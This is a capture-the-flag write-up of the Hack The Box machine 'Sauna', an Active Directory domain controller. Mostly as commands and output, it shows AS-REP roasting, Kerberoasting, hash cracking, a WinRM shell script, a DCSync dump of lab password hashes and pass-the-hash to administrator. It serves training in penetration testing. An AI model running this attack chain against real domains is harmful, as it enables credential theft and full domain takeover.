Sauna is a Windows machine considered easy and Active Directory oriented. The company’s website indicates a potential list of users, allowing to perform a brute force through an ASRepRoasting attack. Getting a shell through WinRM allow to list the domain properties and find a password in the WinLogon registry keys. This user has the necessary rights (DCSync) to dump the NTDS database, which allows to connect with the NTLM hash of the administrator.
Disclaimer : This post is about a quick solution, omitting different searching phases. Only results and a quick approach are presented
Discovery / Enumeration
Un quick port scan give running services on the target
$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.175
Host is up (0.035s latency).
Not shown: 9987 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-17 00:23:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Domain is gathered and services seems to indicate that the machine is an Active Directory Domain Controller.
Important Note : To avoid problems when using DNS resolution, don’t forget to put informations on the resolv.conf and hosts files.
$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kalinux
10.10.10.175 egotistical-bank.local
$ cat /etc/resolv.conf
search egotistical-bank.local
nameserver 10.10.10.175
Potentiels utilisateurs et ASRepRoasting
Having no other entry point, we quickly focus on the company’s website. Some research on the possible exploitation of the IIS server gives nothing. However, an interesting element attracts our attention. Indeed, the company’s “about” page mentions several collaborators as well as the following note.
Meet the team. So many bank account managers but only one security manager. Sounds about right!
From theref, if we mnde From there, thinking of our target machine as a real company, it is possible to imagine possible naming conventions for Active Directory user accounts:
prenom.nom
p.nom
pnom
nom
Based on this, we are able to build a small wordlist of potential accounts. I then spent a few minutes testing trivial passwords to try to find access, without success.
This is where another vulnerability, already exploited on other boxes, comes ;). Named “ASRepRoasting”, this one is based on the “Do not require Kerberos preauthentication” property of an account and allows to retrieve a KRB5ASREP ticket, without prior authentication.
The impacket suite provides a script to automate this request.
$ python GetNPUsers.py egotistical-bank.local/ -usersfile ../../../../HackTheBox/Sauna/users.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:4f51424f1adb173550e06e8404dec4fe$98cac414702d5825e3ad4f4a5abfebe1fce96dfb8dd66d38e1184c67cda213c8b3c59d5a7f841d11b9589cd9c016355943d5fc729070494d50b9da512f509bc03329e682235af3e4599097d88ebab18bf395eb7d8aeb69b2cedb61a87d13aedcf6973a28a7bc09220386c39fa877dd93b3abe3da2ff9954fcbb7b1e35b4ac9565c5862d733b05cc8b0bf51e2e740bea0b709b5ed0bbd6022e7601ecbbf97cfbb7a521f62e7078962a5d84a4f81fc66a41981a6166194785090c07f9029cb1fabfd3575bacc0c84558f6d7950c91cc6c2a0e09ba19585b4d83ce6b953e0cd08de877d13abca6f39cac6d4d47024462dfb7d8a8d3a89637ee1ca6f1982cf395f39
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Bingo ! The fsmith account seems valid. However, the ticket is not right now usable. Indeed, it is necessary to crack it in order to retrieve the password in clear text.
Passacracking and user shell
Now starting a small passcracking session, using john and a simble famous wordlist.
$ sudo john KRB5ASREP_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:22 DONE (2020-02-20 13:27) 0.04438g/s 467776p/s 467776c/s 467776C/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The account password is cracked quite quickly.
$ crackmapexec smb 10.10.10.175 -u fsmith -p 'Thestrokes23'
CME 10.10.10.175:445 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME 10.10.10.175:445 SAUNA [+] EGOTISTICALBANK\fsmith:Thestrokes23
[*] KTHXBYE!
However, this account is not an administrator and possibilities for remote command execution are limited. This is where WinRM (Windows Remote Management) comes in. It is a Microsoft HTTP service/protocol, based on WS-Management (SOAP) that allows remote administration of Windows machines. Back to our nmap scan, the port 5985, used by default by WinRM, is open.
Several ways to exploit it. I chose to use the following Ruby script.
require 'winrm'
conn = WinRM::Connection.new(
endpoint: 'http://10.10.10.175:5985/wsman',
user: 'EGOTISTICAL-BANK\fsmith',
password: 'Thestrokes23',
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
Which give machine access and the first flag !
$ ruby winrm_shell.rb
PS > whoami
egotisticalbank\fsmith
PS > pwd
Path
----
C:\Users\FSmith\Documents
PS > ls ../Desktop
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
Enumeration (1/2) and Kerberoasting
Having access to the machine and the domain, the enumeration phase can begin. Thinking back to the note seen before, we can assume that one user account must have privilegied rights (the “security manager” account).
So first step, enumerate the domain accounts.
$ rpcclient -U 'EGOTISTICAL-BANK/fsmith' 10.10.10.175
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[HSmith] rid:[0x44f]
user:[FSmith] rid:[0x451]
user:[svc_loanmgr] rid:[0x454]
There are 3 accounts, excluding built-in accounts required for the domain. Since we already control fsmith, there are only 2 potential targets left. Both of them are not part of the initial list of users, so it could be the famous security account.
After some research, it turns out that the hsmith account is used as a service account. This can be seen with impacket.
$ python GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
---------------------------------------- ------ -------- -------------------------- ---------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 HSmith 2020-01-23 06:54:34.140321 <never>
We can then exploit it by using a “Kerberoasting” attack. It consists of requesting a TGS ticket for a specific service account. It is then necessary to crack the ticket in order to use the account.
$ python GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -request
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
---------------------------------------- ------ -------- -------------------------- ---------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 HSmith 2020-01-23 06:54:34.140321 <never>
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$SAUNA/HSmith.EGOTISTICALBANK.LOCAL~60111*$3f83e16fcf6121de6d5108bf7f5ca54e$2631853280dbc9343b504b32d3cb9c8c878a30ca9fe445b9f25e9f60b618137342062bf845ec776c30c851525d6e6cc44ff4097614405f8a8eaabb17f2297c6376ffb2b5b4e4d7caa98dea57d1e48e6c47da42936176773853e32a189239ba756ea1d1ac0db03d96ac6165610e747ff039f415c25dc7e5d9957c3783d417a4870a09b430e65f7b7f8d4994713e0cf3ceef3a76de873c265d17f100bc41e85a4fd718ac02aa1bed47a200ff5f1d53ada353105fe6dc551c05afcfa8c0478457385cd1241142d69a8134849ed2cd8d66b68e6438902ecaf3c58c227614e793bad77c149eb9086ce1c92a9b860c4f38adac25bc387b8e8fd49fbc2af925af1eb2183c126035a21312e09cdf464d7767d3c5c61fd070c3fce917758cdc75f2979c667d2d4c01f83ed52963e8fbe5c3cf9d7491aa9e77f3ec85edde2a8eeeab8fde6b6f5b2a66ef149384a1bb77e440d33e29ade5bf1c869f9819ecd55f6d5d97232d500a04cf242e0fecce881539d5e28339c68ac8f8631d56fdabc7c3b84ab392ff1e193ec4dcf8b8fa03e2b2e1d296d0c376b404e72a846ce97bd4a0054ee6e1973bdbe1f7596b883c847a3cf19691eda57aef877d078da2f3cfecb09afdded3d54e4113e43b353f98cc84649bc16c14e7c284fd691c8eb70ac0e4cb95be0661a142964b3945ef592934e9bc4dbcf1206347929aa6d58eec9b84f654b8d644e8ff1f85949047ab66277f89fb9fe1861d57560377299c51c163b721f22d1ee05264e7134eb6524505dec23d3afffdd98dd2c11afbf1b3ae0c119825e795ac742fdad06b593a8943e6d190c776ea8fa168eb647ee41a0bf87b0ce917e6b35bdfed79a298c2fed9137150819492e3784fb14e6e460869ab8fb95452c204df290354925d81ce7ace8c09e52593df3784c2d30821883a5da63098c5428893f02edfc3c09ce4d5fd1f9a5930e696720066082244dee437975243dcb0607ff653f148b0bf0513592142d1ff5fa9c3327977677a85c44821c11e81b0a0791d46f7d059984dcce8180187b9be01230571e6ae71693e463ceee020a7cf4eef64e4b6b837d9d8612b57f4915a0a4473e39a244d1a3e1bd0ac1b32190b7b0d14a26b8e54151fbb69c12581d9d992962be828f007c28fff4b8e5676a5384b7b56dfd195ad635ebfea43fb75f1954708d40bbe542f2684d8ceb7325cc248304b00e3140589d7e0cc95e6d3402f4ae15fde6edea85dfcd38229decbb35e4724907b875be249ed8ff5cd4e645e5d8c0db3de2192c593bc019c6f470a7d4d148c2cfbf7f2c50d0f2bf6bfa0805b93946106b361a1b614b0c5987eaec320cdf6e1cb58a1f793fd187246f395fb175d6a23bb1cc96cd1e5f39a7bee010f5cfd3a1aa9826526e0d73a22c69706a390e4
Using the same technique as for the previous ticket (but for another format) we can try to crack it. We quickly manage to find the password for hsmith which is… The same password as for fsmith.
$ crackmapexec smb 10.10.10.175 -u hsmith -p 'Thestrokes23'
CME 10.10.10.175:445 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME 10.10.10.175:445 SAUNA [+] EGOTISTICALBANK\hsmith:Thestrokes23
[*] KTHXBYE!
However, we also quickly realize that this user does not have particularly interesting privileges for us…
Enumeration (2/2) and getting the secound account
Since the second account recovered does not help to compromise the machine, we can run a second enumeration phase, focused on the machine and files.
After some classical searches, interesting information can be recovered in the WinLogon registry key.
PS > reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368
ShutdownFlags REG_DWORD 0x80000027
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
Using the same technique as for other accounts, we can try the password using the following tool.
$ crackmapexec smb 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
CME 10.10.10.175:445 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME 10.10.10.175:445 SAUNA [+] EGOTISTICALBANK\svc_loanmgr:Moneymakestheworldgoround!
[*] KTHXBYE!
Alright ! We now have all user accounts (excepted built-in ones) !
NTDS dumping and compromission
I’m skipping the research phase in order to go straight to the solution. The recon phase can be made through tools like BloodHound. This way, we can see that our svc_loanmgr user has the DCSynv privileges ! It turns out that the svc_loanmgr account has sufficient privileges to access the NTDS base of the Active Directory.
So, for example, we can remotely extract the NTDS.dit file using impacket.
$ secretsdump.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:57e522d5738515b8a45d0d4d7b6546e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ace005f6cec7d0c39b54a2bc7c55637bfede1ef5c02bdf7056b71770a3563ea2
SAUNA$:aes128-cts-hmac-sha1-96:c46b61ef2fff501974152d8e0871bd4e
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
At this point, we have all needed informations to compromise the machine. Indeed, since we have the NTLM hash of the Domain Administrator account, we can use it as Pass the Hash to access the machine.
$ wmiexec.py egotistical-bank/Administrator@10.10.10.175 -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff'
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator
C:\>hostname
SAUNA
C:\>dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
01/23/2020 03:11 PM <DIR> .
01/23/2020 03:11 PM <DIR> ..
01/23/2020 10:22 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 7,982,071,808 bytes free
w00ted !